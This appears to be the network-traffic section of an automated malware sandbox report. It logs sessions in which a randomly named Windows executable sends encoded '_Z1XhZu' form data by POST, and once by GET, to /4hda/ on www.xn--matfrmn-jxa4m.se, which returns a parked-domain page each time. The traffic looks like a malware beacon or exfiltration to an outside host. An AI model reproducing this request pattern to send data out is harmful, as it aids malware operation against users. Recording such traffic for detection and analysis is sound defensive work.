Aug 9, 2024 08:42:00.637990952 CEST	803	OUT	POST /4hda/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.xn--matfrmn-jxa4m.se Origin: http://www.xn--matfrmn-jxa4m.se Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 212 Referer: http://www.xn--matfrmn-jxa4m.se/4hda/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 5f 5a 31 58 68 5a 75 3d 7a 48 77 78 5a 76 34 50 2f 44 32 4d 2f 48 67 49 57 6e 6b 32 43 46 4a 44 59 5a 35 53 2f 5a 30 73 55 33 36 56 4d 78 2b 44 6f 58 76 74 6f 4b 53 57 66 47 4d 6a 79 6b 4d 46 70 30 42 75 67 46 72 74 58 59 6a 77 57 54 4f 56 51 4d 2b 6d 44 32 51 74 6d 4a 76 42 77 63 6e 57 38 42 4a 58 73 7a 71 4b 35 33 51 76 42 74 6d 62 32 64 6d 72 6b 44 69 43 33 2b 66 56 52 76 66 4a 70 41 6a 33 54 7a 55 43 57 5a 74 44 53 52 59 38 45 6f 66 4b 6b 67 77 43 4c 71 33 67 64 35 50 6d 59 43 36 79 41 6f 45 32 58 50 66 34 5a 63 45 47 63 63 2b 2b 50 36 74 55 67 61 34 73 74 77 75 50 31 53 57 54 78 53 6c 57 45 46 45 38 63 46 56 39 65 33 64 72 Data Ascii: _Z1XhZu=zHwxZv4P/D2M/HgIWnk2CFJDYZ5S/Z0sU36VMx+DoXvtoKSWfGMjykMFp0BugFrtXYjwWTOVQM+mD2QtmJvBwcnW8BJXszqK53QvBtmb2dmrkDiC3+fVRvfJpAj3TzUCWZtDSRY8EofKkgwCLq3gd5PmYC6yAoE2XPf4ZcEGcc++P6tUga4stwuP1SWTxSlWEFE8cFV9e3dr
Aug 9, 2024 08:42:01.305831909 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 09 Aug 2024 06:42:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.29 Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED] Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]\|\|[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
Aug 9, 2024 08:42:01.305855989 CEST	224	IN	Data Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.
Aug 9, 2024 08:42:01.305865049 CEST	1236	IN	Data Raw: 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 20 3d 20 31 2e 30 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 Data Ascii: 0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/responsive/styles/reset.css" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/shared/style/
Aug 9, 2024 08:42:01.305931091 CEST	224	IN	Data Raw: 67 69 6e 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 6c 6f 67 69 6e 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 Data Ascii: gin to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=login">Loopia Customer zone</a> and actualize your plan.</p> <div cla
Aug 9, 2024 08:42:01.305999994 CEST	1236	IN	Data Raw: 73 73 3d 22 64 69 76 69 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 0a 09 09 09 3c 68 32 3e 52 65 67 69 73 74 65 72 20 64 6f 6d 61 69 6e 73 20 61 74 20 4c 6f 6f 70 69 61 3c 2f 68 32 3e 0a 09 09 09 3c 70 3e 50 72 6f 74 65 63 74 20 79 6f 75 72 20 Data Ascii: ss="divider"></div><h2>Register domains at Loopia</h2><p>Protect your company name, brands and ideas as domains at one of the largest domain providers in Scandinavia. <a href="https://www.loopia.com/domainnames/?utm_medium=sitelink
Aug 9, 2024 08:42:01.306010962 CEST	224	IN	Data Raw: 64 20 6d 6f 72 65 20 61 74 20 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 6c 6f 6f 70 69 61 64 6e 73 20 c2 bb 3c 2f 61 3e 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 69 76 69 64 65 72 22 3e 3c 2f 64 69 76 3e Data Ascii: d more at loopia.com/loopiadns </a></p> <div class="divider"></div><h2>Create a website at Loopia - quickly and easily</h2><p>Our full-featured web hosting packages include everything you need to g
Aug 9, 2024 08:42:01.306108952 CEST	1236	IN	Data Raw: 65 74 20 73 74 61 72 74 65 64 20 77 69 74 68 20 79 6f 75 72 20 77 65 62 73 69 74 65 2c 20 65 6d 61 69 6c 2c 20 62 6c 6f 67 20 61 6e 64 20 6f 6e 6c 69 6e 65 20 73 74 6f 72 65 2e 3c 2f 70 3e 0a 09 09 09 3c 70 3e 0a 09 09 09 3c 75 6c 3e 0a 09 09 09 Data Ascii: et started with your website, email, blog and online store.</p><p><ul><li><a href="https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=wordpress">Create your websi
Aug 9, 2024 08:42:01.306294918 CEST	206	IN	Data Raw: 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 73 75 70 70 6f 72 74 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 Data Ascii: loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb">Contact us</a></p></span></div>... /END #footer --></div>... /END .content --></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	49737	194.9.94.85	80	5968	C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 08:42:03.213933945 CEST	827	OUT	POST /4hda/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.xn--matfrmn-jxa4m.se Origin: http://www.xn--matfrmn-jxa4m.se Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 236 Referer: http://www.xn--matfrmn-jxa4m.se/4hda/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 5f 5a 31 58 68 5a 75 3d 7a 48 77 78 5a 76 34 50 2f 44 32 4d 38 6e 77 49 51 45 4d 32 41 6c 4a 45 54 35 35 53 31 35 30 6f 55 33 32 56 4d 77 37 62 6f 46 37 74 76 75 57 57 65 48 4d 6a 78 6b 4d 46 37 55 41 6c 75 6c 72 36 58 59 2f 34 57 53 79 56 51 4d 36 6d 44 79 55 74 6d 2b 44 43 78 4d 6e 55 30 68 4a 52 6f 7a 71 4b 35 33 51 76 42 74 44 32 32 64 2b 72 6e 7a 53 43 32 63 33 4b 62 50 65 37 75 41 6a 33 45 6a 56 46 57 5a 73 7a 53 55 34 57 45 71 33 4b 6b 6b 30 43 4c 59 50 6a 4f 5a 4f 74 58 69 36 6e 50 49 45 35 51 50 4b 4a 52 72 6f 2f 4e 74 6d 6c 48 73 73 4f 38 70 34 50 2f 67 4f 4e 31 51 4f 68 78 79 6c 38 47 46 38 38 4f 53 5a 61 52 44 34 49 37 64 61 51 6a 4d 45 74 39 78 32 48 52 42 79 62 31 2b 42 6f 45 67 3d 3d Data Ascii: _Z1XhZu=zHwxZv4P/D2M8nwIQEM2AlJET55S150oU32VMw7boF7tvuWWeHMjxkMF7UAlulr6XY/4WSyVQM6mDyUtm+DCxMnU0hJRozqK53QvBtD22d+rnzSC2c3KbPe7uAj3EjVFWZszSU4WEq3Kkk0CLYPjOZOtXi6nPIE5QPKJRro/NtmlHssO8p4P/gON1QOhxyl8GF88OSZaRD4I7daQjMEt9x2HRByb1+BoEg==
Aug 9, 2024 08:42:03.866144896 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 09 Aug 2024 06:42:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.29 Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED] Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]\|\|[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
Aug 9, 2024 08:42:03.866161108 CEST	1236	IN	Data Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
Aug 9, 2024 08:42:03.866168976 CEST	1236	IN	Data Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
Aug 9, 2024 08:42:03.866225004 CEST	1236	IN	Data Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
Aug 9, 2024 08:42:03.866235971 CEST	878	IN	Data Raw: 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 73 69 74 65 62 75 69 6c 64 65 72 22 3e 43 72 65 61 74 65 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 77 69 74 68 Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	49738	194.9.94.85	80	5968	C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 08:42:05.771739006 CEST	1840	OUT	POST /4hda/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.xn--matfrmn-jxa4m.se Origin: http://www.xn--matfrmn-jxa4m.se Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1248 Referer: http://www.xn--matfrmn-jxa4m.se/4hda/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 5f 5a 31 58 68 5a 75 3d 7a 48 77 78 5a 76 34 50 2f 44 32 4d 38 6e 77 49 51 45 4d 32 41 6c 4a 45 54 35 35 53 31 35 30 6f 55 33 32 56 4d 77 37 62 6f 46 6a 74 76 62 43 57 66 6b 30 6a 77 6b 4d 46 67 55 42 69 75 6c 71 34 58 59 33 38 57 53 2b 76 51 4f 53 6d 43 58 41 74 6b 4c 33 43 6f 38 6e 55 32 68 4a 51 73 7a 72 65 35 33 41 72 42 74 7a 32 32 64 2b 72 6e 78 4b 43 67 2b 66 4b 55 76 66 4a 70 41 6a 7a 54 7a 55 69 57 5a 31 4c 53 55 38 73 45 61 58 4b 6b 41 51 43 59 4c 33 6a 4e 35 4f 76 51 69 37 69 50 49 4a 35 51 4f 6e 6c 52 75 55 56 4e 76 36 6c 57 39 73 52 6a 4a 38 4f 73 41 47 4b 68 42 32 52 39 32 56 54 66 30 77 4e 44 7a 39 38 64 78 55 46 79 71 65 6f 72 50 31 62 2f 43 50 6d 62 6d 33 2f 67 39 6b 52 5a 36 38 36 4f 59 64 4e 42 77 5a 6d 79 6a 35 78 33 51 2b 79 77 30 51 6e 6d 66 64 30 4b 67 69 35 70 58 55 6c 45 51 68 48 62 64 2f 31 66 49 75 45 6e 79 52 41 32 41 54 4a 6b 5a 4c 39 35 55 2f 33 74 4e 6c 37 58 53 2b 76 64 52 4b 52 6c 39 6c 67 6f 45 6c 6e 30 45 6c 6b 38 69 32 70 72 59 4b 6a 5a 32 39 70 6e 75 4d 39 6b 52 [TRUNCATED] Data Ascii: _Z1XhZu=zHwxZv4P/D2M8nwIQEM2AlJET55S150oU32VMw7boFjtvbCWfk0jwkMFgUBiulq4XY38WS+vQOSmCXAtkL3Co8nU2hJQszre53ArBtz22d+rnxKCg+fKUvfJpAjzTzUiWZ1LSU8sEaXKkAQCYL3jN5OvQi7iPIJ5QOnlRuUVNv6lW9sRjJ8OsAGKhB2R92VTf0wNDz98dxUFyqeorP1b/CPmbm3/g9kRZ686OYdNBwZmyj5x3Q+yw0Qnmfd0Kgi5pXUlEQhHbd/1fIuEnyRA2ATJkZL95U/3tNl7XS+vdRKRl9lgoEln0Elk8i2prYKjZ29pnuM9kRow/mEWkhChhaaRleooEtF1QMZ0NB8PVoAZqdNFZPPIDlPoGWZP0ytNQ6UOw2I8Rdzrw2ydRTXiaaKzjoDULNatI4UlbL7erCANayE/MVLZWX7zdJksVnsNLFeZJfFLReAa/ZffmbSXCO1RFxMq8uODt3szSVHlZctWcIAyuqQef9TCcuF2sOqdDQ3N0W0vdlOJjfmwzfU75RqV4UX5s4Xl3v3rXF04UdyO2N0Y7+197zHyO+2FrMyJQQ/yHwLgo+SCZYAaD7eOD4VaiQWreuUTAtkAyPGF28ApGbzFrr30xALekAjeBT3Xy7AuP2QLzacP6vQk9N8uewxyEzsGlqe7p9VgXW7JcNt0dnF20EN7it8aTNWze1n+qYpIOX2Eyy5UDBsnAeUEDr/Z4a92QlnDsZM8YRTqNYu0R7+4yrLdKdeMsTRDhGD+Q9Dnikh9rPuF587/2CUcA4ojS5a8jPo4X0srpu8NCHId3QGmDiLf0XHYkrCgd+f035mgnN4w/5p4t/4TdQlFaElFXLlhLHYXKbSQWlfu/JHP5JFQIVqn3CFQghG1jiYm8pR4SEocFPl4ArQMaI6CewFVFjQX+uHppYR9XhpSH3agtpt02lob/T2448RsF1srvB8Ulsrj+IKXX8m0PGXmPFRzioSsndkBNwQr7x5B0LHr [TRUNCATED]
Aug 9, 2024 08:42:06.438663006 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 09 Aug 2024 06:42:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.29 Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED] Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]\|\|[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
Aug 9, 2024 08:42:06.438692093 CEST	1236	IN	Data Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
Aug 9, 2024 08:42:06.438703060 CEST	1236	IN	Data Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
Aug 9, 2024 08:42:06.438822031 CEST	1236	IN	Data Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
Aug 9, 2024 08:42:06.438834906 CEST	878	IN	Data Raw: 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 73 69 74 65 62 75 69 6c 64 65 72 22 3e 43 72 65 61 74 65 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 77 69 74 68 Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	49739	194.9.94.85	80	5968	C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 08:42:08.296518087 CEST	527	OUT	GET /4hda/?_Z1XhZu=+FYRabRorC7iiipcHmFJARkvcpdCy5kXHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9/cDU9mAi5AO1k3J2CN+QyvLAoTep+eWpcszcsTCcamkkP6oiBRs=&f6Gp=VzB4OR5 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.xn--matfrmn-jxa4m.se Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
